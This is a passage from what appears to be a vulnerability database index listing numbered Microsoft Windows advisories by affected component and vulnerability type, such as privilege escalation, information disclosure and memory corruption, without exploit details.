Windows up to Server 2019 Terminal Services Memory information disclosure [133211] Microsoft Windows up to Server 2019 Task Scheduler information disclosure [133210] Microsoft Windows 10 1703/10 1709/10 1803/Server 1709/Server 1803 DirectX information disclosure [133209] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133196] Microsoft Windows up to Server 2019 Win32k information disclosure [133195] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133194] Microsoft Windows up to Server 2019 GDI Memory information disclosure [133193] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133192] Microsoft Windows up to Server 2019 OLE Automation memory corruption [133189] Microsoft Windows up to Server 2019 CSRSS privilege escalation [133188] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133187] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133186] Microsoft Windows up to Server 2019 TCP/IP Stack information disclosure [133185] Microsoft Windows up to Server 2019 Win32k privilege escalation [133183] Microsoft Windows up to Server 2019 Win32k privilege escalation [133182] Microsoft Windows up to Server 2019 Win32k privilege escalation [133180] Microsoft Windows up to Server 2019 MS XML XML External Entity [133179] Microsoft Windows up to Server 2019 MS XML XML External Entity [133177] Microsoft Windows up to Server 2019 Device Guard luafv.sys 7PK Security Features [133174] Microsoft Windows up to Server 2019 GDI+ memory corruption [133173] Microsoft Windows up to Server 2019 IOleCvt Interface privilege escalation [133166] Microsoft Windows up to Server 2019 MS XML XML External Entity [133165] Microsoft Windows up to Server 2019 MS XML XML External Entity [133164] Microsoft Windows up to Server 2019 MS XML XML External Entity [133163] Microsoft Windows up to Server 2019 MS XML XML External Entity [133162] Microsoft Windows up to Server 2019 MS XML XML External Entity [131685] Microsoft Windows up to Server 2019 SMB information disclosure [131683] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k privilege escalation [131681] Microsoft Windows up to Server 2019 Win32k privilege escalation [131679] Microsoft Windows up to Server 2019 Kernel information disclosure [131674] Microsoft Windows up to Server 2019 Win32k information disclosure [131673] Microsoft Windows up to Server 2019 Kernel information disclosure [131672] Microsoft Windows up to Server 2019 GDI information disclosure [131671] Microsoft Windows up to Server 2019 VBScript Engine memory corruption [131668] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [131667] Microsoft Windows up to Server 2019 Comctl32.dll memory corruption [131663] Microsoft Windows up to Server 2019 Print Spooler information disclosure [131658] Microsoft Windows up to Server 2019 information disclosure [131657] Microsoft Windows up to Server 2019 memory corruption [131653] Microsoft Windows up to Server 2019 SMB information disclosure [131652] Microsoft Windows up to Server 2019 SMB information disclosure [131651] Microsoft Windows up to Server 2019 Kernel information disclosure [131650] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 Hyper-V privilege escalation [131649] Microsoft Windows up to Server 2019 Kernel privilege escalation [131648] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [131644] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [131642] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Active Directory privilege escalation [131638] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [131632] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DHCP Client memory corruption [131631] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DHCP Client memory corruption [131630] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DHCP Client memory corruption [131629] Microsoft Windows up to Server 2019 Deployment Services TFTP Server privilege escalation [131628] Microsoft Windows up to Server 2019 ActiveX memory corruption [131619] Microsoft Windows up to Server 2019 MS XML XML External Entity [131616] Microsoft Windows REG File Message weak authentication [131328] Microsoft Windows up to Server 2016 Kernel information disclosure [130820] Microsoft Windows up to Server 2012 R2 GDI information disclosure [130819] Microsoft Windows Kernel information disclosure [130818] Microsoft Windows up to Server 2019 GDI information disclosure [130817] Microsoft Windows up to Server 2019 Storage Service privilege escalation [130814] Microsoft Windows up to Server 2019 privilege escalation [130809] Microsoft Windows up to Server 2019 Defender Firewall Security 7PK Security Features [130808] Microsoft Windows up to Server 2019 information disclosure [130807] Microsoft Windows up to Server 2019 Hyper-V information disclosure [130806] Microsoft Windows up to Server 2019 SMB Data Processing Error [130805] Microsoft Windows up to Server 2019 Device Guard privilege escalation [130804] Microsoft Windows up to Server 2019 Device Guard privilege escalation [130803] Microsoft Windows up to Server 2019 SMB Data Processing Error [130802] Microsoft Windows up to Server 2019 Win32k information disclosure [130801] Microsoft Windows up to Server 2019 Device Guard privilege escalation [130800] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130799] Microsoft Windows up to Server 2016 Win32k privilege escalation [130798] Microsoft Windows up to Server 2019 GDI information disclosure [130797] Microsoft Windows up to Server 2019 GDI information disclosure [130796] Microsoft Windows up to Server 2019 GDI information disclosure [130793] Microsoft Windows up to Server 2019 GDI information disclosure [130792] Microsoft Windows up to Server 2019 HID information disclosure [130791] Microsoft Windows up to Server 2019 HID information disclosure [130790] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130789] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130788] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130787] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130786] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130784] Microsoft Windows up to Server 2019 GDI+ memory corruption [130782] Microsoft Windows up to Server 2019 DHCP Server memory corruption [130781] Microsoft Windows up to Server 2019 GDI+ memory corruption [129167] Microsoft Windows VCF File memory corruption [128761] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128760] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128759] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128758] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128757] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128756] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128755] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128754] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128753] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128752] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128751] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [128750] Microsoft Windows up to Server 2019 Runtime privilege escalation [128749] Microsoft Windows up to Server 2019 Kernel information disclosure [128739] Microsoft Windows up to Server 2019 Kernel information disclosure [128738] Microsoft Windows up to Server 2019 Subsystem for Linux information disclosure [128737] Microsoft Windows up to Server 2019 COM Desktop Broker privilege escalation [128736] Microsoft Windows up to Server 2019 Kernel information disclosure [128733] Microsoft Windows up to Server 2019 Authentication Request privilege escalation [128730] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128728] Microsoft Windows up to Server 2019 Kernel information disclosure [128727] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [128726] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [128725] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [128722] Microsoft Windows 10 1803/Server 1803 DHCP Client memory corruption [128718] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [128717] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 Hyper-V privilege escalation [127881] Microsoft Windows 10 1809/Server 2019 memory corruption [127880] Microsoft Windows up to Server 2019 Win32k privilege escalation [127828] Microsoft Windows up to Server 2019 Win32k privilege escalation [127827] Microsoft Windows 10 1809/Server 2019 DirectX information disclosure [127826] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 Win32k information disclosure [127823] Microsoft Windows up to Server 2012 R2 Kernel information disclosure [127822] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2012 Kernel information disclosure [127821] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [127820] Microsoft Windows up to Server 2019 Kernel privilege escalation [127816] Microsoft Windows up to Server 2019 GDI information disclosure [127815] Microsoft Windows up to Server 2019 GDI information disclosure [127812] Microsoft Windows up to Server 2019 Remote Procedure Call information disclosure [127803] Microsoft Windows up to Server 2019 Text-To-Speech memory corruption [127801] Microsoft Windows up to Server 2019 DNS Server memory corruption [126750] Microsoft Windows up to Server 2019 ALPC privilege escalation [126739] Microsoft Windows up to Server 2012 R2 Win32k information disclosure [126737] Microsoft Windows up to Server 2012 R2 DirectX information disclosure [126736] Microsoft Windows up to Server 2019 Win32k privilege escalation [126735] Microsoft Windows up to Server 2019 DirectX privilege escalation [126733] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DirectX privilege escalation [126730] Microsoft Windows up to Server 2019 Active Directory Federation Services cross site scripting [126725] Microsoft Windows up to Server 2019 DirectX privilege escalation [126722] Microsoft Windows up to Server 2019 PowerShell privilege escalation [126718] Microsoft Windows up to Server 2016 Search privilege escalation [126714] Microsoft Windows up to Server 2019 PowerShell privilege escalation [126713] Microsoft Windows up to Server 2019 VBScript Engine memory corruption [126712] Microsoft Windows up to Server 2016 Graphics Component memory corruption [126711] Microsoft Windows up to Server 2019 Deployment Services TFTP Server memory corruption [125123] Microsoft Windows up to Server 2019 Codecs Library information disclosure [125121] Microsoft Windows up to Server 2019 DirectX information disclosure [125120] Microsoft Windows up to Server 2019 Windows Media Player information disclosure [125119] Microsoft Windows up to Server 2019 Windows Media Player information disclosure [125115] Microsoft Windows up to Server 2019 Theme API privilege escalation [125114] Microsoft Windows up to Server 2019 Windows Shell privilege escalation [125113] Microsoft Windows up to Server 2019 Kernel privilege escalation [125112] Microsoft Windows 10 1803/Server 1803 Subsystem for Linux privilege escalation [125111] Microsoft Windows up to Server 2019 Device Guard Code Integrity Policy 7PK Security Features [125110] Microsoft Windows up to Server 2019 DNS Global Blocklist 7PK Security Features [125109] Microsoft Windows up to Server 2019 NTFS privilege escalation [125108] Microsoft Windows up to Server 2019 Filter Manager privilege escalation [125103] Microsoft Windows Server 2008 SP2 Graphics Component information disclosure [125101] Microsoft Windows Graphics Component memory corruption [125098] Microsoft Windows up to Server 2019 JET Database Engine privilege escalation [125097] Microsoft Windows up to Server 2019 DirectX Graphics privilege escalation [125096] Microsoft Windows up to Server 2019 Win32k privilege escalation [125093] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [125092] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [125091] Microsoft Windows up to Server 2019 MS XML XML External Entity [124217] Microsoft Windows Server 2012/Server 2016 Active Directory Federation Services /adfs/ls privilege escalation [123881] Microsoft Windows up to Server 2016 Sandbox privilege escalation [123874] Microsoft Windows up to Server 2016 Kernel information disclosure [123872] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 SMB information disclosure [123868] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [123867] Microsoft Windows 10 1803/Server 1803 Hyper-V privilege escalation [123866] Microsoft Windows 10 1803/Server 1803 Hyper-V privilege escalation [123864] Microsoft Windows up to Server 2016 Hyper-V information disclosure [123853] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Kernel Memory information disclosure [123851] Microsoft Windows up to Server 2016 ALPC privilege escalation [123849] Microsoft Windows up to Server 2016 SMB privilege escalation [123843] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [123842] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [123830] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [123828] Microsoft Windows up to Server 2016 Win32k Graphics privilege escalation [123827] Microsoft Windows up to Server 2016 Image privilege escalation [123825] Microsoft Windows up to Server 2016 MSXML Parser XML External Entity [123823] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [122888] Microsoft Windows 10 1703/10 1709/10 1803/Server 1709/Server 1803 Windows Shell privilege escalation [122886] Microsoft Windows up to Server 2016 DirectX Graphics privilege escalation [122885] Microsoft Windows up to Server 2016 DirectX Graphics privilege escalation [122884] Microsoft Windows up to Server 2016 Win32k privilege escalation [122883] Microsoft Windows up to Server 2016 DirectX Graphics privilege escalation [122861] Microsoft Windows up to Server 2016 Microsoft COM for Windows privilege escalation [122858] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 LNK privilege escalation [122849] Microsoft Windows up to Server 2016 Diagnostic Hub privilege escalation [122848] Microsoft Windows Security Feature 2FA 7PK Security Features [122834] Microsoft Windows up to Server 2016 LNK privilege escalation [122833] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI+ memory corruption [122826] Microsoft Windows 10 1703/10 1709/10 1803/Server 1709/Server 1803 PDF memory corruption [122825] Microsoft Windows up to Server 2016 Graphics privilege escalation [121116] Microsoft Windows up to Server 2016 Sandbox privilege escalation [121111] Microsoft Windows up to Server 2016 Kernel privilege escalation [121110] Microsoft Windows up to Server 2016 Wordpad 7PK Security Features [121107] Microsoft Windows up to Server 2016 DNSAPI DNSAPI.dll Data Processing Error [121092] Microsoft Windows up to Server 2016 FTP Server Data Processing Error [119474] Microsoft Windows up to Server 2016 GDI information disclosure [119471] Microsoft Windows 10 1803/Server 1803 Win32k privilege escalation [119470] Microsoft Windows up to Server 2016 HTTP HTTP.sys Data Processing Error [119469] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Kernel privilege escalation [119468] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119467] Microsoft Windows up to Server 2016 Hypervisor privilege escalation [119466] Microsoft Windows 10 1709/Server 1709 Hyper-V privilege escalation [119465] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119464] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119463] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119461] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119460] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119459] Microsoft Windows up to Server 2016 privilege escalation [119457] Microsoft Windows up to Server 2016 Desktop Bridge privilege escalation [119456] Microsoft Windows up to Server 2016 Kernel information disclosure [119455] Microsoft Windows up to Server 2016 memory corruption [119454] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119453] Microsoft Windows 10 1709/10 1803/Server 1709/Server 1803 WebDAV privilege escalation [119452] Microsoft Windows up to Server 2016 HIDParser privilege escalation [119450] Microsoft Windows 10 1703/10 1709/10 1803/Server 1709/Server 1803 Kernel information disclosure [119448] Microsoft Windows up to Server 2016 Code Integrity Module privilege escalation [119447] Microsoft Windows up to Server 2016 NTFS privilege escalation [119441] Microsoft Windows up to Server 2016 Media Foundation memory corruption [119437] Microsoft Windows up to Server 2016 HTTP Protocol Stack Http.sys Data Processing Error [119436] Microsoft Windows up to Server 2016 privilege escalation [119431] Microsoft Windows up to Server 2016 DNSAPI DNSAPI.dll privilege escalation [117558] Microsoft Windows up to Server 2016 memory corruption [117480] Microsoft Windows up to Server 2016 COM Serialized privilege escalation [117444] Microsoft Windows up to Server 2016 Hyper-V vSMB privilege escalation [117443] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [117442] Microsoft Windows up to Server 2016 VBScript Engine memory corruption [117331] Microsoft Windows Host Compute Host Compute Service Shim privilege escalation [116048] Microsoft Windows up to Server 2016 DirectX Graphics Kernel Subsystem privilege escalation [116047] Microsoft Windows up to Server 2016 OpenType Font Driver atmfd.dll privilege escalation [116045] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [116039] Microsoft Windows up to Server 2016 Remote Desktop Protocol Data Processing Error [116031] Microsoft Windows up to Server 2016 Kernel information disclosure [116030] Microsoft Windows up to Server 2016 SNMP Service Data Processing Error [116026] Microsoft Windows up to Server 2016 Kernel information disclosure [116024] Microsoft Windows up to Server 2016 HTTP.sys privilege escalation [116020] Microsoft Windows 10 1607/10 1703/10 1709/Server 1709/Server 2016 Active Directory 7PK Security Features [116019] Microsoft Windows up to Server 2016 Kernel information disclosure [116008] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116007] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116006] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116005] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116004] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116003] Microsoft Windows up to Server 2016 VBScript Engine memory corruption [115994] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [115804] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [114565] Microsoft Windows 10 1607/10 1703/10 1709/Server 1709/Server 2016 Kernel information disclosure [114550] Microsoft Windows Kernel information disclosure [114548] Microsoft Windows up to Server 2016 CNG Security Feature cng.sys 7PK Security Features [114547] Microsoft Windows up to Server 2016 Kernel information disclosure [114546] Microsoft Windows up to Server 2016 Kernel information disclosure [114545] Microsoft Windows up to Server 2016 Kernel information disclosure [114544] Microsoft Windows up to Server 2016 Kernel information disclosure [114543] Microsoft Windows up to Server 2016 Kernel information disclosure [114542] Microsoft Windows up to Server 2016 Kernel information disclosure [114541] Microsoft Windows up to Server 2016 Kernel information disclosure [114540] Microsoft Windows up to Server 2016 Kernel information disclosure [114536] Microsoft Windows up to Server 2016 CredSSP weak authentication [114535] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [114534] Microsoft Windows 10/10 1511/10 1607/10 1703/10 1709 Scripting Host 7PK Security Features [114531] Microsoft Windows up to Server 2016 Windows Installer privilege escalation [114530] Microsoft Windows up to Server 2016 GDI privilege escalation [114529] Microsoft Windows up to Server 2016 GDI privilege escalation [114528] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI privilege escalation [114527] Microsoft Windows up to Server 2016 Kernel information disclosure [114526] Microsoft Windows up to Server 2016 Kernel information disclosure [114525] Microsoft Windows up to Server 2016 Kernel information disclosure [114522] Microsoft Windows 10 1607/10 1703/Server 2016 Desktop Bridge privilege escalation [114521] Microsoft Windows up to Server 2016 Video Control privilege escalation [114520] Microsoft Windows 10/Server 1709/Server 2016 Desktop Bridge privilege escalation [114518] Microsoft Windows up to Server 2016 Remote Assistance XML External Entity [114517] Microsoft Windows 10/Server 1709/Server 2016 Desktop Bridge VFS privilege escalation [114516] Microsoft Windows up to Server 2016 Windows Shell privilege escalation [113264] Microsoft Windows 8.1/RT 8.1/Server 2012 R2 SMBv2/SMBv3 denial of service [113262] Microsoft Windows 10/Server 1709 Storage Services privilege escalation [113261] Microsoft Windows 10/Server 1709 Security Feature 7PK Security Features [113260] Microsoft Windows up to Server 2016 Kernel privilege escalation [113259] Microsoft Windows 10/Server 1709/Server 2016 NTFS privilege escalation [113258] Microsoft Windows 10/Server 1709 Kernel information disclosure [113257] Microsoft Windows 7 SP1/Server 2008 SP2/Server 2012 Kernel information disclosure [113256] Microsoft Windows 7 SP1/Server 2008 SP2/Server 2012 Kernel information disclosure [113255] Microsoft Windows 7 SP1/Server 2008 SP2/Server 2012 Kernel information disclosure [113254] Microsoft Windows up to Server 2016 Kernel information disclosure [113253] Microsoft Windows 10/Server 1709/Server 2016 Kernel privilege escalation [113252] Microsoft Windows up to Server 2016 Kernel privilege escalation [113251] Microsoft Windows 10/Server 1709 Kernel privilege escalation [113250] Microsoft Windows 10/Server 1709/Server 2016 Kernel privilege escalation [113249] Microsoft Windows up to Server 2016 Kernel privilege escalation [113248] Microsoft Windows up to Server 2016 Kernel information disclosure [113247] Microsoft Windows 7 SP1/Server 2008 R2 SP1 EOT Font Engine information disclosure [113246] Microsoft Windows 7 SP1/Server 2008 R2 SP1 EOT Font Engine information disclosure [113245] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2012 EOT Font Engine information disclosure [113244] Microsoft Windows 7 SP1/Server 2008 R2 SP1 EOT Font Engine information disclosure [113243] Microsoft Windows 10/Server 2016 MultiPoint Management privilege escalation [113242] Microsoft Windows up to Server 2016 Common Log File System Driver privilege escalation [113241] Microsoft Windows up to Server 2016 Common Log File System Driver privilege escalation [113240] Microsoft Windows 10/Server 1709/Server 2016 AppContainer privilege escalation [113238] Microsoft Windows 10 1709/Server 1709 Named Pipe File System privilege escalation [113230] Microsoft Windows up to Server 2016 Scripting Engine information disclosure [113229] Microsoft Windows up to Server 2016 StructuredQuery memory corruption [111358] Microsoft Windows up to Server 2016 IPsec memory corruption [111347] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Color Management Icm32.dll information disclosure [110547] Microsoft Windows up to Server 2016 its:/ Protocol information disclosure [110531] Microsoft Windows 10/Server 2016 Device Guard 7PK Security Features [110522] Microsoft Windows up to Server 2016 RRAS privilege escalation [110350] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [110318] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [109360] Microsoft Windows up to Server 2016 Windows Search Data Processing Error [107920] Microsoft Windows up to Vista SP2 Graphics information disclosure [107759] Microsoft Windows up to Server 2016 SMB privilege escalation [107757] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [107756] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [107753] Microsoft Windows 10/Server 2016 SMB Data Processing Error [107744] Microsoft Windows up to Server 2016 DNSAPI DNSAPI.dll privilege escalation [107740] Microsoft Windows up to Server 2016 Graphics privilege escalation [107739] Microsoft Windows up to Server 2016 Graphics privilege escalation [107738] Microsoft Windows up to Server 2016 Search information disclosure [107734] Microsoft Windows 10/Server 2016 SMB privilege escalation [107731] Microsoft Windows 7 SP1 Shell memory corruption [107730] Microsoft Windows up to Server 2016 Search Remote privilege escalation [107724] Microsoft Windows up to Server 2016 Text Services Framework privilege escalation [107723] Microsoft Windows up to Server 2016 SMB information disclosure [106523] Microsoft Windows up to Server 2016 PDF Library memory corruption [106516] Microsoft Windows up to Server 2016 PDF Library memory corruption [106498] Microsoft Windows up to Server 2016 Shell privilege escalation [106497] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Uniscribe memory corruption [106496] Microsoft Windows up to Server 2016 Uniscribe information disclosure [106495] Microsoft Windows up to Server 2012 R2 Uniscribe memory corruption [106492] Microsoft Windows Server 2012/Server 2012 R2/Server 2016 DHCP Service memory corruption [106489] Microsoft Windows up to Server 2016 Graphics Win32k win32k!fsc_CalcGrayRow information disclosure [106472] Microsoft Windows up to Server 2016 Bluetooth Driver Object BlueBorne privilege escalation [106454] Microsoft Windows up to Server 2016 Windows NetBT Session Services race condition [105051] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Font Library Data Processing Error [105049] Microsoft Windows 10 1703 Remote Desktop Protocol Data Processing Error [105017] Microsoft Windows up to Server 2016 Error Reporting privilege escalation [105013] Microsoft Windows 10 1607/10 1703/Server 2016 Hyper-V privilege escalation [105011] Microsoft Windows up to Server 2016 Windows Search memory corruption [105010] Microsoft Windows up to Server 2016 Win32k privilege escalation [105009] Microsoft Windows up to Server 2016 Input Method Editor Data Processing Error [104990] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [104989] Microsoft Windows up to Server 2016 NetBIOS Data Processing Error [104982] Microsoft Windows up to XP SMBv1 Smbloris denial of service [103446] Microsoft Windows up to Server 2016 Search privilege escalation [103445] Microsoft Windows up to Server 2016 Wordpad privilege escalation [103444] Microsoft Windows up to Server 2016 Explorer privilege escalation [103442] Microsoft Windows 10/Server 2016 HoloLens privilege escalation [103441] Microsoft Windows up to Server 2016 Object HTTP.sys information disclosure [103431] Microsoft Windows up to Server 2016 PowerShell privilege escalation [103429] Microsoft Windows up to Server 2016 Kerberos privilege escalation [103420] Microsoft Windows up to Server 2016 Kerberos weak authentication [103417] Microsoft Windows up to Server 2016 Windows Shell 7PK Security Features [102513] Microsoft Windows Server 2003 SP2/XP SP3 OLE olecnv32.dll privilege escalation [102511] Microsoft Windows Server 2003 SP2/XP SP3 RDP EsteemAudit privilege escalation [102412] Microsoft Windows up to Server 2016 PDF privilege escalation [102401] Microsoft Windows 7 SP1/Server 2008 R2 SP1 GDI USP10!NextCharInLiga information disclosure [102387] Microsoft Windows up to XP SP3 Search privilege escalation [102386] Microsoft Windows up to Server 2012 R2 Uniscribe memory corruption [102385] Microsoft Windows up to Server 2016 Font Library memory corruption [102377] Microsoft Windows up to Vista SP2 lnk File privilege escalation [102376] Microsoft Windows up to Server 2016 CAB File Data Processing Error [102375] Microsoft Windows up to Server 2016 PDF Parser privilege escalation [102374] Microsoft Windows up to Server 2016 PDF Parser privilege escalation [102373] Microsoft Windows up to Server 2016 Uniscribe Font USP10!MergeLigRecords privilege escalation [101820] Microsoft Windows Vista/7/8.1 NtfsCommonCreate denial of service [101817] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101816] Microsoft Windows up to Server 2016 Malware Protection Engine setCaller memory corruption [101815] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [101814] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101813] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [101812] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101811] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101810] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101491] Microsoft Windows up to XP SP3/Server 2003 SP2 Remote Desktop Protocol gpkcsp.dll memory corruption [101043] Microsoft Windows up to XP SP3 SMB privilege escalation [101042] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101041] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101040] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101039] Microsoft Windows up to XP SP3 SMB privilege escalation [101038] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101037] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101036] Microsoft Windows up to XP SP3 SMBv1 Server privilege escalation [101035] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101034] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101028] Microsoft Windows 10/Server 2016 Hyper-V vSMB privilege escalation [101026] Microsoft Windows DNS Server privilege escalation [101011] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 ActiveX Object Memory information disclosure [101002] Microsoft Windows up to Server 2016 SMBv1 Server Data Processing Error [101001] Microsoft Windows up to Server 2016 SMBv1 Server Data Processing Error [101000] Microsoft Windows up to Server 2016 SMBv1 Server Data Processing Error [100999] Microsoft Windows up to Server 2016 SMBv1 Server Data Processing Error [100918] Microsoft Windows 8/8.1/10/Server 2012/Server 2016 Malware Protection Service memory corruption [100854] Microsoft Windows Server 2003 SP2 RRAS ERRATICGOPHER memory corruption [99904] Microsoft Windows Server 2003 SP2/XP SP3 SmartCard Authentication EsteemAudit privilege escalation [99696] Microsoft Windows up to Vista SP2 Adobe Type Manager Font Driver ATMFD.dll information disclosure [99685] Microsoft Windows up to Vista SP2 LDAP privilege escalation [99683] Microsoft Windows 10 1607/10 1703/Server 2012 R2/Server 2016 Active Directory 7PK Security Features [99681] Microsoft Windows up to Server 2016 OLE Integrity-Level Check privilege escalation [99680] Microsoft Windows up to Vista SP2 Win32k privilege escalation [99667] Microsoft Windows 10/Server 2016 Active Directory Service Unresponsive privilege escalation [98561] Microsoft IIS 6.0 on Windows Server 2003 WebDAV ScStoragePathFromUrl Immortal/ExploidingCan memory corruption [98272] Microsoft Windows up to 10/Server 2016 Local Session privilege escalation [98113] Microsoft Windows up to Vista SP2 XML Core Services information disclosure [98112] Microsoft Windows up to Vista SP2 DirectShow information disclosure [98111] Microsoft Windows 7 SP1/Vista SP2 DVD Maker cross site request forgery [98110] Microsoft Windows Active Directory Federation Services information disclosure [98069] Microsoft Windows up to Server 2012 R2 Color Management privilege escalation [98068] Microsoft Windows up to Vista SP2 Graphics Component USP10!otlList::insertAt memory corruption [98067] Microsoft Windows up to Vista SP2 Color Management information disclosure [98066] Microsoft Windows Color Management information disclosure [98065] Microsoft Windows up to Vista SP2 GDI+ information disclosure [98058] Microsoft Windows iSNS Server memory corruption [98056] Microsoft Windows up to Server 2016 DNS Query information disclosure [98055] Microsoft Windows up to Vista SP2 DLL Loader privilege escalation [98054] Microsoft Windows up to Server 2016 SMBv2/SMBv3 denial of service [98052] Microsoft Windows up to Vista SP2 Uniscribe information disclosure [98051] Microsoft Windows up to Vista SP2 Uniscribe information disclosure [98050] Microsoft Windows up to Vista SP2 Uniscribe Read/Write memory corruption [98049] Microsoft Windows Uniscribe information disclosure [98048] Microsoft Windows Uniscribe information disclosure [98047] Microsoft Windows Uniscribe information disclosure [98046] Microsoft Windows Uniscribe information disclosure [98045] Microsoft Windows Uniscribe information disclosure [98044] Microsoft Windows Uniscribe information disclosure [98043] Microsoft Windows Uniscribe information disclosure [98042] Microsoft Windows Uniscribe information disclosure [98041] Microsoft Windows Uniscribe information disclosure [98040] Microsoft Windows Uniscribe information disclosure [98039] Microsoft Windows Uniscribe information disclosure [98038] Microsoft Windows Uniscribe information disclosure [98037] Microsoft Windows Uniscribe information disclosure [98036] Microsoft Windows Uniscribe information disclosure [98035] Microsoft Windows Uniscribe information disclosure [98034] Microsoft Windows Uniscribe information disclosure [98033] Microsoft Windows Uniscribe information disclosure [98032] Microsoft Windows Uniscribe information disclosure [98031] Microsoft Windows Uniscribe rule information disclosure [98030] Microsoft Windows Uniscribe memory corruption [98029] Microsoft Windows Uniscribe memory corruption [98028] Microsoft Windows Uniscribe memory corruption [98027] Microsoft Windows Uniscribe memory corruption [98026] Microsoft Windows Uniscribe memory corruption [98025] Microsoft Windows Uniscribe memory corruption [98024] Microsoft Windows Uniscribe Data Processing Error [98023] Microsoft Windows up to Vista SP2 SMB privilege escalation [98022] Microsoft Windows up to XP SP3 SMB information disclosure [98021] Microsoft Windows up to XP SP3 SMB privilege escalation [98020] Microsoft Windows up to XP SP3 SMB privilege escalation [98019] Microsoft Windows up to XP SP3 SMB privilege 